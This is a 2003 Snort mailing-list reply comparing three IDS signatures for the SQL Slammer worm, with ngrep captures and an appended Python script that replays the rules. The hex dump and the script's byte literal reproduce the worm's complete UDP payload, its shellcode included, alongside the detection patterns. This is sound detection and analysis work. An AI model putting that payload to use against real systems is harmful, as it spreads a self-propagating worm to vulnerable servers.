[Snort-sigs] SQL Slammer Worm Signature

John Sage jsage at ...425...
Mon Feb 10 11:06:04 EST 2003


Michael:

On Mon, Feb 10, 2003 at 05:19:38PM +0800, Michael.Advani at ...1221... wrote:
> Someone formerly posted the rule for capturing SQL slammer as:
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm 
> Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; 
> sid:9998; rev:1;)
> 
> which differs from the one found in snort.org (snortrules-current.tar.gz):
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
> attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
> content:"sock"; content:"send"; reference:bugtraq,5310;
> classtype:misc-attack; reference:bugtraq,5311;
> reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)
> 
> Others suggest this rule:
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
> Activity"; content:
> "dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)
> 
> How come there are so many versions? Though the header part is identical,
> the 'meat' is totally different!

They're simply three different ways of looking at the same thing:

> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm 
> Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; 
> sid:9998; rev:1;)

A hex search of packet content:

[toot at ...1275... /storage/snort/old_snorts/013003]# ngrep -eXt -I snort-0130\@1918.log "0x0401010101010101" "dst port 1434"
input: snort-0130@1918.log
filter: ip and ( dst port 1434 )
match: 0x0401010101010101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
  .....................................................................................
  ...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
  nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
  .....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a...E...@...........)
  .......E.j..E.P1.Qf..x.Q.E.P.E.P....                                                 
#
<snip>
exit



> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
> attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
> content:"sock"; content:"send"; reference:bugtraq,5310;
> classtype:misc-attack; reference:bugtraq,5311;
> reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)

Another hex search:

[toot at ...1275... /storage/snort/old_snorts/013003]# ngrep -eXt -I snort-0130\@1918.log "0x81F10301049B81F101" "dst port 1434"
input: snort-0130@1918.log
filter: ip and ( dst port 1434 )
match: 0x81F10301049B81F101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
  .....................................................................................
  ...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
  nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
  .....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a...E...@...........)
  .......E.j..E.P1.Qf..x.Q.E.P.E.P....                                                 
#
<snip>
exit



> alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
> Activity"; content:
> "dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)

Note that this queries for ASCII content, not hex.

[root at ...1275... /storage/snort/old_snorts/013003]# ngrep -ext -I snort-0130\@1918.log "dllhel32hkernQhounthickChGetTf" "dst port 1434"
input: snort-0130@1918.log
filter: ip and ( dst port 1434 )
match: dllhel32hkernQhounthickChGetTf
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
  04 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 01 01 01 01 01 01 01    01 01 01 01 01 01 01 01    ................
  01 dc c9 b0 42 eb 0e 01    01 01 01 01 01 01 70 ae    ....B.........p.
  42 01 70 ae 42 90 90 90    90 90 90 90 90 68 dc c9    B.p.B........h..
  b0 42 b8 01 01 01 01 31    c9 b1 18 50 e2 fd 35 01    .B.....1...P..5.
  01 01 05 50 89 e5 51 68    2e 64 6c 6c 68 65 6c 33    ...P..Qh.dllhel3
  32 68 6b 65 72 6e 51 68    6f 75 6e 74 68 69 63 6b    2hkernQhounthick
  43 68 47 65 74 54 66 b9    6c 6c 51 68 33 32 2e 64    ChGetTf.llQh32.d
  68 77 73 32 5f 66 b9 65    74 51 68 73 6f 63 6b 66    hws2_f.etQhsockf
  b9 74 6f 51 68 73 65 6e    64 be 18 10 ae 42 8d 45    .toQhsend....B.E
  d4 50 ff 16 50 8d 45 e0    50 8d 45 f0 50 ff 16 50    .P..P.E.P.E.P..P
  be 10 10 ae 42 8b 1e 8b    03 3d 55 8b ec 51 74 05    ....B....=U..Qt.
  be 1c 10 ae 42 ff 16 ff    d0 31 c9 51 51 50 81 f1    ....B....1.QQP..
  03 01 04 9b 81 f1 01 01    01 01 51 8d 45 cc 50 8b    ..........Q.E.P.
  45 c0 50 ff 16 6a 11 6a    02 6a 02 ff d0 50 8d 45    E.P..j.j.j...P.E
  c4 50 8b 45 c0 50 ff 16    89 c6 09 db 81 f3 3c 61    .P.E.P........<a
  d9 ff 8b 45 b4 8d 0c 40    8d 14 88 c1 e2 04 01 c2    ...E...@........
  c1 e2 08 29 c2 8d 04 90    01 d8 89 45 b4 6a 10 8d    ...).......E.j..
  45 b0 50 31 c9 51 66 81    f1 78 01 51 8d 45 03 50    E.P1.Qf..x.Q.E.P
  8b 45 ac 50 ff d6 eb ca                               .E.P....        
#
<snip>


- John
-- 
"You are in a little maze of twisty passages, all different."

    PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705
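
The three rules above fire on the same packet at different offsets. The script below is an added example, not code from the original post or from Snort: it transcribes the 376-byte UDP payload from the hex dump in the post, implements only the Snort `content` / `depth` / `offset` semantics these rules use (non-relative matching, every content searched independently from the start of the payload), and runs each rule against the worm payload and against two constructed packets. The constructed packets are assumptions, not captures: one is an assumed well-formed SQL Server Resolution (SSRP) instance query (0x04 opcode followed by an instance name), the other a 0x04 request padded with 0x01 bytes but carrying no shellcode. The rule names `RULE_PADDING`, `RULE_SNORT_ORG` and `RULE_ASCII` are labels chosen here, not identifiers from the thread.

```python
"""Replay the three Slammer signatures from the thread against the 376-byte
UDP payload transcribed from the ngrep -x dump in the post.

Added example; not code from the original post or from Snort. Only the
'content', 'depth' and 'offset' options are honoured, as non-relative
matches; the rule header (udp, dst port 1434) is not evaluated here.
"""
import re

# Worm payload, byte-for-byte from the hex dump: one 0x04 opcode, 95 bytes
# of 0x01 padding, then the shellcode. One hex string per dump line.
SLAMMER_PAYLOAD = bytes.fromhex(
    "04" + "01" * 95
    + "01dcc9b042eb0e0101010101010170ae"
    + "420170ae42909090909090909068dcc9"
    + "b042b80101010131c9b11850e2fd3501"
    + "0101055089e551682e646c6c68656c33"
    + "32686b65726e51686f756e746869636b"
    + "43684765745466b96c6c516833322e64"
    + "687773325f66b965745168736f636b66"
    + "b9746f516873656e64be1810ae428d45"
    + "d450ff16508d45e0508d45f050ff1650"
    + "be1010ae428b1e8b033d558bec517405"
    + "be1c10ae42ff16ffd031c951515081f1"
    + "0301049b81f101010101518d45cc508b"
    + "45c050ff166a116a026a02ffd0508d45"
    + "c4508b45c050ff1689c609db81f33c61"
    + "d9ff8b45b48d0c408d1488c1e20401c2"
    + "c1e20829c28d049001d88945b46a108d"
    + "45b05031c9516681f17801518d450350"
    + "8b45ac50ffd6ebca"
)

# Constructed packets (assumptions, not captures) for comparison.
SSRP_INSTANCE_QUERY = b"\x04MSSQLSERVER\x00"   # assumed SSRP 0x04 instance query
PADDED_PROBE = b"\x04" + b"\x01" * 64           # opcode plus padding, no shellcode

# The three rules quoted in the thread, each joined onto one line.
RULE_PADDING = (
    'alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm '
    'Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; '
    'sid:9998; rev:1;)'
)
RULE_SNORT_ORG = (
    'alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation '
    'attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; '
    'content:"sock"; content:"send"; reference:bugtraq,5310; '
    'classtype:misc-attack; reference:bugtraq,5311; '
    'reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)'
)
RULE_ASCII = (
    'alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm '
    'Activity"; content:"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)'
)
RULES = {"sid 9998 (0x04 + 0x01 padding)": RULE_PADDING,
         "sid 2003 (snort.org)": RULE_SNORT_ORG,
         "shellcode ASCII strings": RULE_ASCII}

# One rule option: keyword, optional ':' value (quoted or bare), trailing ';'.
OPTION_RE = re.compile(r'\s*(\w+)\s*(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?;')


def parse_content(literal: str) -> bytes:
    """Expand a Snort content literal: text outside |..| is ASCII, inside is hex."""
    out = bytearray()
    for i, part in enumerate(literal.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def parse_rule(rule: str):
    """Return (header, [content dicts]) from a one-line Snort rule.

    depth/offset bind to the content option that precedes them; every
    other option (msg, classtype, reference, sid, rev) is ignored.
    """
    header, _, body = rule.partition("(")
    body = body.strip().rstrip(")")
    contents = []
    for m in OPTION_RE.finditer(body):
        key, val = m.group(1), m.group(2)
        if key == "content":
            contents.append({"pattern": parse_content(val.strip('"')),
                             "depth": None, "offset": 0})
        elif key == "depth" and contents:
            contents[-1]["depth"] = int(val)
        elif key == "offset" and contents:
            contents[-1]["offset"] = int(val)
    return header.strip(), contents


def match_rule(rule: str, payload: bytes):
    """Apply each content (within its offset/depth window) to the payload.

    Returns one match offset per content, or None if any content is absent.
    Without distance/within, every content is searched from the payload
    start, which is how these non-relative rules behave.
    """
    _, contents = parse_rule(rule)
    hits = []
    for c in contents:
        start = c["offset"]
        end = len(payload) if c["depth"] is None else start + c["depth"]
        pos = payload.find(c["pattern"], start, end)
        if pos < 0:
            return None
        hits.append(pos)
    return hits


def evaluate_all(payload: bytes) -> dict:
    """Match offsets per rule label, or None where a rule does not fire."""
    return {name: match_rule(rule, payload) for name, rule in RULES.items()}


if __name__ == "__main__":
    for label, pkt in [("Slammer capture", SLAMMER_PAYLOAD),
                       ("SSRP instance query", SSRP_INSTANCE_QUERY),
                       ("padded 0x04 probe", PADDED_PROBE)]:
        print(label)
        for name, hits in evaluate_all(pkt).items():
            print(f"  {name:32s} {hits}")
```

Against the capture the snort.org rule reports hits at byte 0 (the opcode, pinned there by `depth:1`), 270 (the `81 F1 ...` XOR sequence), 203 (`sock`) and 213 (`send`); the ASCII rule hits at 153, where the pushed `dllhel32...` string begins. The padded probe is the useful negative: the sid 9998 rule fires on it because seven 0x01 bytes after 0x04 is all it asks for, while the other two rules stay quiet, which is the practical difference between the three despite the identical headers.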
